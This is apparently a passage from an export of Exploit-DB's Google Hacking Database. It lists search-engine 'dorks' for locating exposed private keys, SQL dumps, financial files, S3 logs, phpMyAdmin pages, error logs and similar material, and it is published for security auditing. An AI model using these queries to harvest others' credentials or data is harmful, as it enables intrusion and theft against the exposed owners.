<query>BEGIN (CERTIFICATE|DSA|RSA) filetype:csr</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=BEGIN+%28CERTIFICATE%7CDSA%7CRSA%29+filetype%3Acsr</querystring>
<edb></edb>
<date>2004-07-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>324</id>
<link>https://www.exploit-db.com/ghdb/324</link>
<category>Files Containing Juicy Info</category>
<shortDescription>private key files (.key)</shortDescription>
<textualDescription>This search will find private key files... Private key files are supposed to be, well... private.</textualDescription>
<query>BEGIN (CERTIFICATE|DSA|RSA) filetype:key</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=BEGIN+%28CERTIFICATE%7CDSA%7CRSA%29+filetype%3Akey</querystring>
<edb></edb>
<date>2004-07-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>450</id>
<link>https://www.exploit-db.com/ghdb/450</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Quicken data files</shortDescription>
<textualDescription>The QDATA.QDF file (found sometimes in zipped &quot;QDATA&quot; archives online, sometimes not) contains financial data, including banking accounts, credit card numbers, etc. This search has only a couple hits so far, but this should be popular in the coming year as Quicken 2005 makes it very easy and suggests to backup your data online.</textualDescription>
<query>filetype:QDF QDF</query>
<querystring>https://www.google.com/search?q=filetype%3AQDF+QDF</querystring>
<edb></edb>
<date>2004-08-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1097</id>
<link>https://www.exploit-db.com/ghdb/1097</link>
<category>Files Containing Juicy Info</category>
<shortDescription>rdbqds -site:.edu -site:.mil -site:.gov</shortDescription>
<textualDescription>Ceasar encryption is a rather simple encryption. You simply shift letters up or down across the entire length of the message... In the url I did this with the word &quot;secret&quot; which equals rdbqds.. (1 char shift).It appears that protected PDF documents use this very encryption to protect its documents. At least one version of adobe acrobat did. A big thank you to Golfo for the links he provided in the forum to assist.http://www.math.cankaya.edu.tr/~a.kabarcik/decrypt.html http://www.math.cankaya.edu.tr/~a.kabarcik/encrypt.html</textualDescription>
<query>rdbqds -site:.edu -site:.mil -site:.gov</query>
<querystring>https://www.google.com/search?safe=off&amp;c2coff=1&amp;q=rdbqds+-site%3A.edu+-site%3A.mil+-site%3A.gov</querystring>
<edb></edb>
<date>2005-09-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>8195</id>
<link>https://www.exploit-db.com/ghdb/8195</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Re: &quot;index of /backup.sql</shortDescription>
<textualDescription># Google Dork: index of /backup.sql
# Files Containing Juicy Info
# Date:26/05/2023
# Exploit Author: Ramjan Ali Sabber</textualDescription>
<query>Re: &quot;index of /backup.sql</query>
<querystring>https://www.google.com/search?q=Re: &quot;index of /backup.sql</querystring>
<edb></edb>
<date>2023-05-26</date>
<author>Ramjan Ali Sabber</author>
</entry>
<entry>
<id>7966</id>
<link>https://www.exploit-db.com/ghdb/7966</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Re: intext:&quot;index of /&quot; &quot;server at&quot;</shortDescription>
<textualDescription> Google Dork: intext:&quot;index of /&quot; &quot;server at&quot;
# Files Containing Juicy Info
# Date:15/07/2022
# Exploit Author: Shehzad Soni</textualDescription>
<query>Re: intext:&quot;index of /&quot; &quot;server at&quot;</query>
<querystring>https://www.google.com/search?q=Re: intext:&quot;index of /&quot; &quot;server at&quot;</querystring>
<edb></edb>
<date>2022-07-15</date>
<author>Shehzad Soni</author>
</entry>
<entry>
<id>8109</id>
<link>https://www.exploit-db.com/ghdb/8109</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Re: intext:&quot;index of&quot; &quot;wp-content.zip&quot; - Files Containing Juicy Info</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;wp-content.zip&quot;
# Files Containing Juicy Info
# Date:14/03/2023
# Exploit Author: Sharique Raza</textualDescription>
<query>Re: intext:&quot;index of&quot; &quot;wp-content.zip&quot; - Files Containing Juicy Info</query>
<querystring>https://www.google.com/search?q=Re: intext:&quot;index of&quot; &quot;wp-content.zip&quot; - Files Containing Juicy Info</querystring>
<edb></edb>
<date>2023-03-14</date>
<author>Sharique Raza</author>
</entry>
<entry>
<id>8170</id>
<link>https://www.exploit-db.com/ghdb/8170</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Re: intitle:&quot;index of&quot; &quot;docker-compose.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;docker-compose.yml&quot;
# Files Containing Juicy Info
# Date:28/04/2023
# Exploit Author: Mohd S</textualDescription>
<query>Re: intitle:&quot;index of&quot; &quot;docker-compose.yml&quot;</query>
<querystring>https://www.google.com/search?q=Re: intitle:&quot;index of&quot; &quot;docker-compose.yml&quot;</querystring>
<edb></edb>
<date>2023-04-28</date>
<author>Mohd S</author>
</entry>
<entry>
<id>8196</id>
<link>https://www.exploit-db.com/ghdb/8196</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Re: intitle:index.of conf.php</shortDescription>
<textualDescription># Google Dork: intitle:index.of conf.php
# Files Containing Juicy Info
# Date:26/05/2023
# Exploit Author: Ramjan Ali Sabber</textualDescription>
<query>Re: intitle:index.of conf.php</query>
<querystring>https://www.google.com/search?q=Re: intitle:index.of conf.php</querystring>
<edb></edb>
<date>2023-05-26</date>
<author>Ramjan Ali Sabber</author>
</entry>
<entry>
<id>8205</id>
<link>https://www.exploit-db.com/ghdb/8205</link>
<category>Files Containing Juicy Info</category>
<shortDescription>RE: inurl:/wp-content/uploads/wpo_wcpdf</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/uploads/wpo_wcpdf
# Files Containing Juicy Info
# Date:02/06/2023
# Exploit Author: Stuart Steenberg</textualDescription>
<query>RE: inurl:/wp-content/uploads/wpo_wcpdf</query>
<querystring>https://www.google.com/search?q=RE: inurl:/wp-content/uploads/wpo_wcpdf</querystring>
<edb></edb>
<date>2023-06-02</date>
<author>Stuart Steenberg</author>
</entry>
<entry>
<id>31</id>
<link>https://www.exploit-db.com/ghdb/31</link>
<category>Files Containing Juicy Info</category>
<shortDescription>robots.txt</shortDescription>
<textualDescription>The robots.txt file contains &quot;rules&quot; about where web spiders are allowed (and NOT allowed) to look in a website's directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what's somewhat public and what's considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff.However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server!</textualDescription>
<query>intitle:index.of robots.txt</query>
<querystring>https://www.google.com/search?q=intitle:Index.of+robots.txt&amp;safe=off&amp;start=10&amp;sa=N</querystring>
<edb></edb>
<date>2003-06-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>3828</id>
<link>https://www.exploit-db.com/ghdb/3828</link>
<category>Files Containing Juicy Info</category>
<shortDescription>runtimevar softwareVersion=</shortDescription>
<textualDescription>Hits: 807
Config file from Thomson home routers, sometimes it contains password's and
user's encrypted
Contains ACS servers info from ISP's</textualDescription>
<query>runtimevar softwareVersion=</query>
<querystring>https://www.google.com/search?q=runtimevar softwareVersion=</querystring>
<edb></edb>
<date>2013-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>4652</id>
<link>https://www.exploit-db.com/ghdb/4652</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ruTorrent/rTorrent - Web UI (BitTorrent Client - Download/Upload/Seed/Control/File Explorer)</shortDescription>
<textualDescription>intitle:&quot;rutorrent v3&quot; AND intext:Uploaded -github.com
- - -
## Other Work
- ruTorrent ~ https://www.exploit-db.com/ghdb/4652/
- Deluge v1 ~ https://www.exploit-db.com/ghdb/4741/
- Deluge v2 ~ https://www.exploit-db.com/ghdb/4742/
</textualDescription>
<query>intitle:&quot;rutorrent v3&quot; AND intext:Uploaded -github.com</query>
<querystring>https://www.google.com/?q=intitle:&quot;rutorrent v3&quot; AND intext:Uploaded -github.com</querystring>
<edb></edb>
<date>2018-01-04</date>
<author>Pancaker</author>
</entry>
<entry>
<id>5314</id>
<link>https://www.exploit-db.com/ghdb/5314</link>
<category>Files Containing Juicy Info</category>
<shortDescription>s3 site:amazonaws.com filetype:log</shortDescription>
<textualDescription>Sensitive Logs stored on AWS S3 bucket
# Google Dork: s3 site:amazonaws.com filetype:log
# Date: [1-08-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>s3 site:amazonaws.com filetype:log</query>
<querystring>https://www.google.com/search?q=s3 site:amazonaws.com filetype:log</querystring>
<edb></edb>
<date>2019-08-02</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>5245</id>
<link>https://www.exploit-db.com/ghdb/5245</link>
<category>Files Containing Juicy Info</category>
<shortDescription>s3 site:amazonaws.com filetype:sql</shortDescription>
<textualDescription>SQL Dumps stored on AWS S3 Buckets.
</textualDescription>
<query>s3 site:amazonaws.com filetype:sql</query>
<querystring>https://www.google.com/search?q=s3 site:amazonaws.com filetype:sql</querystring>
<edb></edb>
<date>2019-06-04</date>
<author>Dec0y</author>
</entry>
<entry>
<id>5233</id>
<link>https://www.exploit-db.com/ghdb/5233</link>
<category>Files Containing Juicy Info</category>
<shortDescription>s3 site:amazonaws.com filetype:xls login</shortDescription>
<textualDescription>Excel files containing sensitive personal information stored on AWS S3
buckets
*Google Dork*
s3 site:amazonaws.com filetype:xls login
*Dates: 30*-05-2019
*Dork Author:* acc3ssp0int
*Tested on:* any OS with a functioning browser running Google.com</textualDescription>
<query>s3 site:amazonaws.com filetype:xls login</query>
<querystring>https://www.google.com/search?q=s3 site:amazonaws.com filetype:xls login</querystring>
<edb></edb>
<date>2019-05-31</date>
<author>acc3ssp0int</author>
</entry>
<entry>
<id>8010</id>
<link>https://www.exploit-db.com/ghdb/8010</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Sensitive Dork Exposing Uploads and Transcation details</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;upi&quot; &quot;wp-content&quot;
# Files Containing Juicy Info
# Date:27/07/2022
# Exploit Author: Chaitanya Redteam</textualDescription>
<query>Sensitive Dork Exposing Uploads and Transcation details</query>
<querystring>https://www.google.com/search?q=Sensitive Dork Exposing Uploads and Transcation details</querystring>
<edb></edb>
<date>2022-07-27</date>
<author>Chaitanya Redteam</author>
</entry>
<entry>
<id>7867</id>
<link>https://www.exploit-db.com/ghdb/7867</link>
<category>Files Containing Juicy Info</category>
<shortDescription>service._vti_pvt.index</shortDescription>
<textualDescription># Google Dork: service._vti_pvt.index
# Files Containing Juicy Info
# Date:15/06/2022
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>service._vti_pvt.index</query>
<querystring>https://www.google.com/search?q=service._vti_pvt.index</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7627</id>
<link>https://www.exploit-db.com/ghdb/7627</link>
<category>Files Containing Juicy Info</category>
<shortDescription>showing putty logs</shortDescription>
<textualDescription># Google Dork: filetype:log username putty
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Shubh Mishra</textualDescription>
<query>showing putty logs</query>
<querystring>https://www.google.com/search?q=showing putty logs</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Shubh Mishra</author>
</entry>
<entry>
<id>7733</id>
<link>https://www.exploit-db.com/ghdb/7733</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site: com intext &quot; organisation data&quot; filetype:xls</shortDescription>
<textualDescription># Google Dork: site: com intext &quot; organisation data&quot; filetype:xls
# Files Containing Juicy Info
# Date: 10/11/2021
# Exploit Author: Sonali Bhutad</textualDescription>
<query>site: com intext &quot; organisation data&quot; filetype:xls</query>
<querystring>https://www.google.com/search?q=site: com intext &quot; organisation data&quot; filetype:xls</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Sonali Bhutad</author>
</entry>
<entry>
<id>8240</id>
<link>https://www.exploit-db.com/ghdb/8240</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site: zoom+meeting+passcode</shortDescription>
<textualDescription># Google Dork: site: zoom+meeting+passcode
# Files Containing Juicy Info
# Date: 12/09/2023
# Exploit tarun mahato</textualDescription>
<query>site: zoom+meeting+passcode</query>
<querystring>https://www.google.com/search?q=site: zoom+meeting+passcode</querystring>
<edb></edb>
<date>2023-09-12</date>
<author>tarun mahato</author>
</entry>
<entry>
<id>8371</id>
<link>https://www.exploit-db.com/ghdb/8371</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.* inurl:php_error.log - Sensitive information disclosure</shortDescription>
<textualDescription># Google Dork: site:*.* inurl:php_error.log - Sensitive information disclosure
# Files Containing Juicy Info
# Date: 04/12/2023
# Exploit: Shiva Medituru</textualDescription>
<query>site:*.* inurl:php_error.log - Sensitive information disclosure</query>
<querystring>https://www.google.com/search?q=site:*.* inurl:php_error.log - Sensitive information disclosure</querystring>
<edb></edb>
<date>2023-12-04</date>
<author>Shiva Medituru</author>
</entry>
<entry>
<id>8372</id>
<link>https://www.exploit-db.com/ghdb/8372</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.*.* intitle:&quot;index of&quot; *.pcapng</shortDescription>
<textualDescription># Google Dork: site:*.*.* intitle:&quot;index of&quot; *.pcapng
# Files Containing Juicy Info
# Date: 04/12/2023
# Exploit: Connect2maviya
</textualDescription>
<query>site:*.*.* intitle:&quot;index of&quot; *.pcapng</query>
<querystring>https://www.google.com/search?q=site:*.*.* intitle:&quot;index of&quot; *.pcapng</querystring>
<edb></edb>
<date>2023-12-04</date>
<author>Connect2maviya</author>
</entry>
<entry>
<id>8367</id>
<link>https://www.exploit-db.com/ghdb/8367</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.ac.* filetype:template</shortDescription>
<textualDescription># Google Dork: site:*.ac.* filetype:template
# Files Containing Juicy Info
# Date: 30/11/2023
# Exploit: Connect2maviya</textualDescription>
<query>site:*.ac.* filetype:template</query>
<querystring>https://www.google.com/search?q=site:*.ac.* filetype:template</querystring>
<edb></edb>
<date>2023-11-30</date>
<author>Connect2maviya</author>
</entry>
<entry>
<id>8354</id>
<link>https://www.exploit-db.com/ghdb/8354</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.ac.* intitle:&quot;index of&quot; *.ics</shortDescription>
<textualDescription># Google Dork: site:*.ac.* intitle:&quot;index of&quot; *.ics
# Files Containing Juicy Info
# Date: 23/11/2023
# Exploit: Connect2maviya
</textualDescription>
<query>site:*.ac.* intitle:&quot;index of&quot; *.ics</query>
<querystring>https://www.google.com/search?q=site:*.ac.* intitle:&quot;index of&quot; *.ics</querystring>
<edb></edb>
<date>2023-11-23</date>
<author>Connect2maviya</author>
</entry>
<entry>
<id>7949</id>
<link>https://www.exploit-db.com/ghdb/7949</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.com &quot;index of&quot; error_logs</shortDescription>
<textualDescription># Google Dork: site:*.com &quot;index of&quot; error_logs
# Files Containing Juicy Info
# Date:22/06/2022
# Exploit Author: Chirag Lundwani</textualDescription>
<query>site:*.com &quot;index of&quot; error_logs</query>
<querystring>https://www.google.com/search?q=site:*.com &quot;index of&quot; error_logs</querystring>
<edb></edb>
<date>2022-06-22</date>
<author>Chirag Lundwani</author>
</entry>
<entry>
<id>8359</id>
<link>https://www.exploit-db.com/ghdb/8359</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.com */admin.txt</shortDescription>
<textualDescription># Google Dork: site:*.com */admin.txt
# Files Containing Juicy Info
# Date: 27/11/2023
# Exploit: saurabh kode</textualDescription>
<query>site:*.com */admin.txt</query>
<querystring>https://www.google.com/search?q=site:*.com */admin.txt</querystring>
<edb></edb>
<date>2023-11-27</date>
<author>saurabh kode</author>
</entry>
<entry>
<id>5284</id>
<link>https://www.exploit-db.com/ghdb/5284</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.com intitle:&quot;Thank You For Your Order&quot; intext:Click Here to Download</shortDescription>
<textualDescription># Google Dork : site:*.com intitle:”Thank You For Your Order” intext:Click Here to Download
# Author: Ayan Saha
# Date: 21.07.2019
# Tested on : Chrome
</textualDescription>
<query>site:*.com intitle:&quot;Thank You For Your Order&quot; intext:Click Here to Download</query>
<querystring>https://www.google.com/search?q=site:*.com intitle:&quot;Thank You For Your Order&quot; intext:Click Here to Download</querystring>
<edb></edb>
<date>2019-07-24</date>
<author>Ayan Saha</author>
</entry>
<entry>
<id>8368</id>
<link>https://www.exploit-db.com/ghdb/8368</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.edu.* filetype:template</shortDescription>
<textualDescription># Google Dork: site:*.edu.* filetype:template
# Files Containing Juicy Info
# Date: 30/11/2023
# Exploit: Connect2maviya</textualDescription>
<query>site:*.edu.* filetype:template</query>
<querystring>https://www.google.com/search?q=site:*.edu.* filetype:template</querystring>
<edb></edb>
<date>2023-11-30</date>
<author>Connect2maviya</author>
</entry>
<entry>
<id>8355</id>
<link>https://www.exploit-db.com/ghdb/8355</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.edu.* intitle:&quot;index of&quot; *.ics</shortDescription>
<textualDescription># Google Dork: site:*.edu.* intitle:&quot;index of&quot; *.ics
# Files Containing Juicy Info
# Date: 23/11/2023
# Exploit: Connect2maviya
</textualDescription>
<query>site:*.edu.* intitle:&quot;index of&quot; *.ics</query>
<querystring>https://www.google.com/search?q=site:*.edu.* intitle:&quot;index of&quot; *.ics</querystring>
<edb></edb>
<date>2023-11-23</date>
<author>Connect2maviya</author>
</entry>
<entry>
<id>8347</id>
<link>https://www.exploit-db.com/ghdb/8347</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.edu.* inurl:globalprotect</shortDescription>
<textualDescription># Google Dork: site:*.edu.* inurl:globalprotect
# Files Containing Juicy Info
# Date: 17/11/2023
# Exploit: Connect2maviya</textualDescription>
<query>site:*.edu.* inurl:globalprotect</query>
<querystring>https://www.google.com/search?q=site:*.edu.* inurl:globalprotect</querystring>
<edb></edb>
<date>2023-11-17</date>
<author>Connect2maviya</author>
</entry>
<entry>
<id>7792</id>
<link>https://www.exploit-db.com/ghdb/7792</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.edu.in intitle:index of</shortDescription>
<textualDescription># Google Dork: site:*.edu.in intitle:index of
# Files Containing Juicy Info
# Date:13/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>site:*.edu.in intitle:index of</query>
<querystring>https://www.google.com/search?q=site:*.edu.in intitle:index of</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7601</id>
<link>https://www.exploit-db.com/ghdb/7601</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.example.com inurl:(elmah.axd | errorlog.axd) ext:axd</shortDescription>
<textualDescription># Google Dork: *site: .example.com inurl:(elmah.axd | errorlog.axd) ext:axd
# Category: Files Containing Juicy Info
# Date: 03-11-2021
# Description: This dork can be used to identify public elmah instances which provides access to information about requests and responses, Session cookies, Session state, Query string and post variables, Physical path of the requested file of the application.
# Author: Girish
</textualDescription>
<query>site:*.example.com inurl:(elmah.axd | errorlog.axd) ext:axd</query>
<querystring>https://www.google.com/search?q=site:*.example.com inurl:(elmah.axd | errorlog.axd) ext:axd</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Girish</author>
</entry>
<entry>
<id>5593</id>
<link>https://www.exploit-db.com/ghdb/5593</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.freshservice.com/support/solutions</shortDescription>
<textualDescription># Google Dork that Shows Interesting Information
# Companies using Freshdesk's Freshservice sometimes accidentally leave their KBs/Solutions public when migrating from another ticketing
# service. Some do not require login to see internal tech support solutions..
# add intext:{whatever industry or term} for a more targeted approach.
site:*.freshservice.com/support/solutions
Author: MiningOmerta
</textualDescription>
<query>site:*.freshservice.com/support/solutions</query>
<querystring>https://www.google.com/search?q=site:*.freshservice.com/support/solutions</querystring>
<edb></edb>
<date>2019-10-22</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>7801</id>
<link>https://www.exploit-db.com/ghdb/7801</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.github.io intext:cheatsheet+offensive+pentesting</shortDescription>
<textualDescription># Google Dork: site:*.github.io intext:cheatsheet+offensive+pentesting
# Files Containing Juicy Info
# Date:14/11/2021
# Exploit Author: Dharmendra Yadav</textualDescription>
<query>site:*.github.io intext:cheatsheet+offensive+pentesting</query>
<querystring>https://www.google.com/search?q=site:*.github.io intext:cheatsheet+offensive+pentesting</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Dharmendra Yadav</author>
</entry>
<entry>
<id>7813</id>
<link>https://www.exploit-db.com/ghdb/7813</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.id intitle:&quot;index of&quot; &quot;screenshot*.jpg&quot;</shortDescription>
<textualDescription># Google Dork: site:*.id intitle:&quot;index of&quot; &quot;screenshot*.jpg&quot;
# Files Containing Juicy Info
# Date:15/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>site:*.id intitle:&quot;index of&quot; &quot;screenshot*.jpg&quot;</query>
<querystring>https://www.google.com/search?q=site:*.id intitle:&quot;index of&quot; &quot;screenshot*.jpg&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7790</id>
<link>https://www.exploit-db.com/ghdb/7790</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.ng intitle:index of</shortDescription>
<textualDescription># Google Dork: site:*.ng intitle:index of
# Files Containing Juicy Info
# Date:13/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>site:*.ng intitle:index of</query>
<querystring>https://www.google.com/search?q=site:*.ng intitle:index of</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7812</id>
<link>https://www.exploit-db.com/ghdb/7812</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*.se intitle:&quot;index of&quot;</shortDescription>
<textualDescription># Google Dork: site:*.se intitle:&quot;index of&quot;
# Files Containing Juicy Info
# Date:15/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>site:*.se intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=site:*.se intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>5549</id>
<link>https://www.exploit-db.com/ghdb/5549</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/*/conf/httpd.conf</shortDescription>
<textualDescription>Files Containing Juicy info:
site:*/*/conf/httpd.conf
Reza Abasi(Turku)
</textualDescription>
<query>site:*/*/conf/httpd.conf</query>
<querystring>https://www.google.com/search?q=site:*/*/conf/httpd.conf</querystring>
<edb></edb>
<date>2019-09-24</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7769</id>
<link>https://www.exploit-db.com/ghdb/7769</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/admin-portal/</shortDescription>
<textualDescription># Google Dork: site:*/admin-portal/
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Hognaglo komi Sergio</textualDescription>
<query>site:*/admin-portal/</query>
<querystring>https://www.google.com/search?q=site:*/admin-portal/</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Hognaglo komi Sergio</author>
</entry>
<entry>
<id>7701</id>
<link>https://www.exploit-db.com/ghdb/7701</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/forgotpassword.php</shortDescription>
<textualDescription># Google Dork: site:*/forgotpassword.php
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Anirudh Kumar Kushwaha</textualDescription>
<query>site:*/forgotpassword.php</query>
<querystring>https://www.google.com/search?q=site:*/forgotpassword.php</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Anirudh Kumar Kushwaha</author>
</entry>
<entry>
<id>5441</id>
<link>https://www.exploit-db.com/ghdb/5441</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/log/access_log</shortDescription>
<textualDescription>file containing juicy info:
site:*/log/access_log
site:*/logs/error_log
Reza Abasi(Turku)
</textualDescription>
<query>site:*/log/access_log</query>
<querystring>https://www.google.com/search?q=site:*/log/access_log</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5554</id>
<link>https://www.exploit-db.com/ghdb/5554</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/logs/error.log</shortDescription>
<textualDescription>Error Pages:
site:*/logs/error.log
site:*/*/log/error.log
Reza Abasi(Turku)
</textualDescription>
<query>site:*/logs/error.log</query>
<querystring>https://www.google.com/search?q=site:*/logs/error.log</querystring>
<edb></edb>
<date>2019-09-25</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7435</id>
<link>https://www.exploit-db.com/ghdb/7435</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/node_modules/ content:&quot;PEM&quot;</shortDescription>
<textualDescription># Google Dork: site:*/node_modules/ content:&quot;PEM&quot;
# Files Containing Juicy Info
# Date:14/10/2021
# Exploit Author: César Hernández Obispo</textualDescription>
<query>site:*/node_modules/ content:&quot;PEM&quot;</query>
<querystring>https://www.google.com/search?q=site:*/node_modules/ content:&quot;PEM&quot;</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>7434</id>
<link>https://www.exploit-db.com/ghdb/7434</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/node_modules/ content:&quot;ssh&quot;</shortDescription>
<textualDescription># Google Dork: site:*/node_modules/ content:&quot;ssh&quot;
# Files Containing Juicy Info
# Date:14/10/2021
# Exploit Author: César Hernández Obispo</textualDescription>
<query>site:*/node_modules/ content:&quot;ssh&quot;</query>
<querystring>https://www.google.com/search?q=site:*/node_modules/ content:&quot;ssh&quot;</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>7390</id>
<link>https://www.exploit-db.com/ghdb/7390</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/oauth/token</shortDescription>
<textualDescription># Google Dork: site:*/oauth/token
# Files Containing Juicy Info
# Date:04/10/2021
# Exploit Author: reza abasi</textualDescription>
<query>site:*/oauth/token</query>
<querystring>https://www.google.com/search?q=site:*/oauth/token</querystring>
<edb></edb>
<date>2021-10-05</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5410</id>
<link>https://www.exploit-db.com/ghdb/5410</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/phpinfo.php intitle:&quot;phpinfo()&quot;</shortDescription>
<textualDescription>Files containing Juicy info:
site:*/phpinfo.php intitle:&quot;phpinfo()&quot;
inurl:/info.php intitle:&quot;phpinfo()&quot;
Reza ABasi(Turku)
</textualDescription>
<query>site:*/phpinfo.php intitle:&quot;phpinfo()&quot;</query>
<querystring>https://www.google.com/search?q=site:*/phpinfo.php intitle:&quot;phpinfo()&quot;</querystring>
<edb></edb>
<date>2019-08-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7265</id>
<link>https://www.exploit-db.com/ghdb/7265</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/phpmyadmin/import.php</shortDescription>
<textualDescription># Google Dork: site:*/phpmyadmin/import.php
# Files Containing Juicy Info
# Date:14/09/2021
# Exploit Author: Reza Abasi</textualDescription>
<query>site:*/phpmyadmin/import.php</query>
<querystring>https://www.google.com/search?q=site:*/phpmyadmin/import.php</querystring>
<edb></edb>
<date>2021-09-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5466</id>
<link>https://www.exploit-db.com/ghdb/5466</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/phpMyAdmin/robots.txt</shortDescription>
<textualDescription>Robots.txt file of site:
site:*/phpMyAdmin/robots.txt
Reza Abasi(Turku)
</textualDescription>
<query>site:*/phpMyAdmin/robots.txt</query>
<querystring>https://www.google.com/search?q=site:*/phpMyAdmin/robots.txt</querystring>
<edb></edb>
<date>2019-08-28</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7006</id>
<link>https://www.exploit-db.com/ghdb/7006</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/phpmyadmin/server_databases.php</shortDescription>
<textualDescription># Google Dork: site:*/phpmyadmin/server_databases.php
# Files Containing Juicy Info
# Exploit Author: Reza Abasi</textualDescription>
<query>site:*/phpmyadmin/server_databases.php</query>
<querystring>https://www.google.com/search?q=site:*/phpmyadmin/server_databases.php</querystring>
<edb></edb>
<date>2021-06-11</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7266</id>
<link>https://www.exploit-db.com/ghdb/7266</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/phpmyadmin/server_import.php</shortDescription>
<textualDescription># Google Dork: site:*/phpmyadmin/server_import.php
# Files Containing Juicy info
# Date:14/09/2021
# Exploit Author: Reza Abasi
</textualDescription>
<query>site:*/phpmyadmin/server_import.php</query>
<querystring>https://www.google.com/search?q=site:*/phpmyadmin/server_import.php</querystring>
<edb></edb>
<date>2021-09-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6996</id>
<link>https://www.exploit-db.com/ghdb/6996</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:*/phpmyadmin/server_privileges.php</shortDescription>
<textualDescription> # Dork: Files Containing Juicy info:
site:*/phpmyadmin/server_privileges.php
BR,
Reza Abasi (Turku)
Cyber Sec researcher
</textualDescription>
<query>site:*/phpmyadmin/server_privileges.php</query>
<querystring>https://www.google.com/search?q=site:*/phpmyadmin/server_privileges.php</querystring>
<edb></edb>
<date>2021-06-09</date>
